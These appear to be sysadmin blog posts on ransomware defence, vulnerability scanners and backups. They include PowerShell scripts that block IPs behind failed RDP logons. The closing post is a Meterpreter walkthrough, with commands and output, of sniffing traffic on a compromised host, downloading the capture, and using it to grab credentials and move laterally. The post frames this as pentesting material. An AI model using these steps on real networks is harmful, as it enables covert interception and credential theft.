Small Business Protection Against Ransomware


There are a lot of systems that can help you protect against ransomware, and which ones you can afford depends on your budget. Normally a small business does not have the resources for systems that detect threats in email, web filtering on the machine, a firewall appliance, etc.


Still, there are a few things that normally help small companies fight ransomware:


  1. Backup. Yes, backup is not expensive, and you have different options: one that only backs up some files from your shared folder, and one that backs up the full image of the server. Choose depending on your needs and requirements. In my case I would recommend an image backup of your server or workstation: one full backup plus incremental backups. Shadow Protect is a good option.
  2. A good antivirus. One I like a lot is Webroot: it uses few resources and fights ransomware pretty well. It protects you especially when you are on the internet.
  3. Run Windows updates. Your system needs to be patched and all your software updated, like Java.
  4. Common sense. Yes, this is very important: be careful where you go on the internet and which files you open if somebody sends you one by email. Normally I do not open a file I did not ask for, even if it comes from my mother.

If you do the math, you will spend on only two things: the backup solution and the antivirus. I would not go with a free backup; you need something automatic, an unattended backup. Set Windows updates to automatic and pay attention to what you do on your computer: read the alerts that Windows or the antivirus show you when there is a risk.


Automated vulnerability scanners produce a lot of false positive reports. This creates a lot of work for security analysts, and some of them hate the scanners. Are vulnerability scanners broken?


Not necessarily. Automated vulnerability scanners still provide a lot of help identifying weaknesses in a system or OS, and they are cheaper compared to a penetration test.


Security is an ongoing process. Automated scanners help raise the security bar of any system, but at the same time they should not replace penetration testing. After you have been running the automated tool for a while, you bring in a penetration tester. The pentester can focus on the most difficult weaknesses because you already found the easy ones with the vulnerability scanner.


So, are vulnerability scanners broken? No, they keep helping to protect the data.


Several times you check the Security log and notice some IP addresses trying to guess usernames and passwords for Remote Desktop (RDP).


This script is for Windows 2008/2008R2 and Windows 7.


Because we want to block and stop those attacks, a lot of security analysts block the IP address in the firewall (Windows or appliance). That is good, but there is a big chance that another IP shows up attacking while the analyst is sleeping or doing something else.


This script reads the Windows Security log looking for Event ID 4625 in the last 5 minutes, then strips the log text and duplicate IP addresses, and at the end writes the IP addresses into the firewall to block them. Note that this block is for the whole IP, not just the port.


The next time you run the script, it deletes all the IP addresses the script wrote in the firewall and begins the process again.


If there is no new IP address to add, the script ends.


This script is basic. There is no port involved, just IP addresses, and if a legitimate user types a wrong password, his/her IP will be blocked the next time you run the script.


To run the script every 5 minutes you will need to create a scheduled task on the Windows machine that runs it every 5 minutes.


If you want to copy the script, please copy and paste it into Notepad first to make sure the code is clean; otherwise you will get some errors and have to troubleshoot.


If you need custom code, please contact me and I will be glad to help you for a small fee.


This is the script:

### Remove the rules created by the previous run, so the blocks are rebuilt from the current window.
netsh advfirewall firewall delete rule name="Block IP Attacker"

### This checks the last 5 minutes of failed logons (Event ID 4625). If you want to change the window, replace the -5 with any number of minutes you want.
Get-EventLog -LogName Security -After (Get-Date).AddMinutes(-5) | Where-Object {$_.EventID -eq 4625} | Format-List Message | Out-File result.txt

### This finds the lines that carry the source IP address
Get-Content result.txt | Select-String -Pattern "Source Network Address:" | Out-File result2.txt

### CLEAN THE OUTPUT to eliminate the label and the "-" that local logons report instead of an address
Get-Content result2.txt | ForEach-Object {$_ -replace "Source Network Address:", ""} | ForEach-Object {$_ -replace "-", ""} | Out-File result3.txt

Get-Content result3.txt | ForEach-Object {$_.Trim()} | Out-File result4.txt

Get-Content result4.txt | Where-Object {$_ -ne ""} > result5.txt

### Remove duplicate addresses (Get-Unique needs sorted input)
Get-Content result5.txt | Sort-Object | Get-Unique | Out-File result6.txt

Get-Content result6.txt | Where-Object {$_ -ne ""} > iptoblock.txt

Get-Content iptoblock.txt

### CREATING FIREWALL RULES. IF THERE IS NOT ANY ATTACK THE PROGRAM WILL EXIT and will print "No New Incidents, I will sleep waiting for new attacks"
$c = Get-Content iptoblock.txt | Where-Object {$_ -ne ""}
if (-not $c) {
    Write-Host "No New Incidents, I will sleep waiting for new attacks"
    exit
}

foreach ($ip in $c) {
    netsh advfirewall firewall add rule name="Block IP Attacker" dir=in interface=any action=block remoteip="$ip"
}

### This will tell you the script finished, you can comment this line
Write-Host "WORK DONE"
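As an added example (my own rewrite, not the script above), here is the same idea done without the temporary files and with a failure threshold, so a legitimate user who mistypes a password once is not blocked. It reads Event ID 4625 with Get-WinEvent, takes the source address from the event XML field IpAddress, counts failures per address, and only writes a firewall rule for addresses that reach the threshold. It keeps the original's rule lifecycle (last run's rule is deleted, then rebuilt from the current window). The 5 minute window, the threshold of 5, the rule name and the script path in the schtasks line are assumptions; it must run elevated, and it uses netsh because New-NetFirewallRule does not exist on 2008/2008R2/Windows 7.

```powershell
# Added example, not the original script: threshold-based RDP brute-force blocker.
# Reads event 4625 with Get-WinEvent and parses the event XML, so no temporary
# files are needed, and only blocks a source after it fails $Threshold times in
# the window. A user who mistypes a password once is therefore not locked out.
# The window, threshold, rule name and script path below are assumptions.
param(
    [int]$Minutes     = 5,                   # look-back window
    [int]$Threshold   = 5,                   # failures per source before it is blocked
    [string]$RuleName = "Block IP Attacker"  # same rule name as the original script
)

# Sources that must never be blocked: local logons report "-" or a loopback address.
$ignore = @("-", "::1", "127.0.0.1")

# Collect the failed logons in the window. SilentlyContinue suppresses the
# "No events were found" error Get-WinEvent raises when the window is clean.
$events = Get-WinEvent -FilterHashtable @{
    LogName   = "Security"
    Id        = 4625
    StartTime = (Get-Date).AddMinutes(-$Minutes)
} -ErrorAction SilentlyContinue

# The source address is the EventData field named "IpAddress"; read it from the
# event XML instead of scraping the formatted message text.
$sources = foreach ($e in $events) {
    $xml = [xml]$e.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq "IpAddress" })."#text"
}

# Count failures per source and keep only those at or above the threshold.
$attackers = $sources |
    Where-Object { $_ -and ($ignore -notcontains $_) } |
    Group-Object |
    Where-Object { $_.Count -ge $Threshold }

# Same rule lifecycle as the original: last run's blocks are dropped and rebuilt
# from the current window, so a block expires once the failures stop.
netsh advfirewall firewall delete rule name="$RuleName" | Out-Null

if (-not $attackers) {
    Write-Host "No New Incidents, I will sleep waiting for new attacks"
    exit
}

# netsh is used because New-NetFirewallRule does not exist on 2008/2008R2/Win7.
foreach ($a in $attackers) {
    Write-Host ("Blocking {0}: {1} failed logons in the last {2} minutes" -f $a.Name, $a.Count, $Minutes)
    netsh advfirewall firewall add rule name="$RuleName" dir=in interface=any action=block remoteip="$($a.Name)" | Out-Null
}
Write-Host "WORK DONE"

# To run it every 5 minutes as SYSTEM, register a task once from an elevated
# prompt (the script path is an assumption):
#   schtasks /Create /SC MINUTE /MO 5 /TN "BlockRdpAttackers" /RU SYSTEM /RL HIGHEST /TR "powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\Block-RdpAttackers.ps1"
```

Pick the threshold together with your account lockout policy: a threshold below the lockout count means an attacker is blocked at the firewall before the real account gets locked, while the loopback and "-" exclusions keep the script from writing rules that would never match a remote attacker anyway.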











How is it possible that a lot of companies work without a good backup? The risk is high. Very often, at the moment you least expect it, you get hit, and then the only solution you have is to restore from backup.


These are some examples:


1. A user is surfing the internet and hits a site that infects his/her machine, and the malware is a crypto-locker. Terrible: it begins to encrypt all the network drives mapped on that computer, and some of these malware families even encrypt the shadow copies. You have two options: restore from backup or pay the ransom.


2. This is very common: users show up at 7:30 a.m. and the accounting or file server is not working. You go and check and discover the hard drive is failing, or the whole OS is corrupted including the data, etc. Especially with a hardware failure you need to restore from backup.


In the previous examples, what happens if you do not have a backup? Then prepare your resume; very soon you will begin to look for a job, and the company will lose money.


Now, what happens if you have a backup? You are happy and begin to restore the data or the server, and then discover the backup is not working right and you cannot restore anything. Nobody ever tested the backups.


Now we can say: Houston, we have a problem!


I saw other companies that lost between 30 GB and 1 TB of data and restored it in a couple of hours, very quickly. Good. Why? Because they implemented a good backup solution according to their needs.


Types of backups: image or files.


Not all backups are the same; it depends on many factors. If you have servers running complex applications that would need to be restored, then you need a backup that creates images of the machine.


For file servers it is different: you just need to back up the files or data, so in case the files become corrupted, encrypted or deleted you can restore them very easily, even during production time.


There are different strategies to protect company data or servers in case of disaster. You know your company and environment; like people say: choose wisely!


Meterpreter allows you to run a packet sniffer through an extension, and something very important is that the capture is never saved on the target's hard drive. I will explain how to enable the packet sniffer in Metasploit with Meterpreter:


Let's assume you are already connected through some exploit with Meterpreter running; then you type the following:


### Load the sniffer extension
meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > ?

Sniffer Commands
    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_release     Free captured packets on a specific interface instead of downloading them
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

### List the interfaces available to sniff traffic on
meterpreter > sniffer_interfaces
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
### Interface 2 is the network one, so we start the capture on that interface:
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
### Stop the sniffer
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2
[*] There are 3099 packets (1365925 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
### Download the data
meterpreter > sniffer_dump 2 /root/raul.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 3099 packets (1427905 bytes)
[*] Downloaded 036% (524288/1427905)...
[*] Downloaded 073% (1048576/1427905)...
[*] Downloaded 100% (1427905/1427905)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/raul.pcap
Then I was able to open the file raul.pcap in Wireshark.
Where can you use this? You can use it to grab credentials or move laterally in the network if you are pentesting it, or to troubleshoot a computer problem on the network.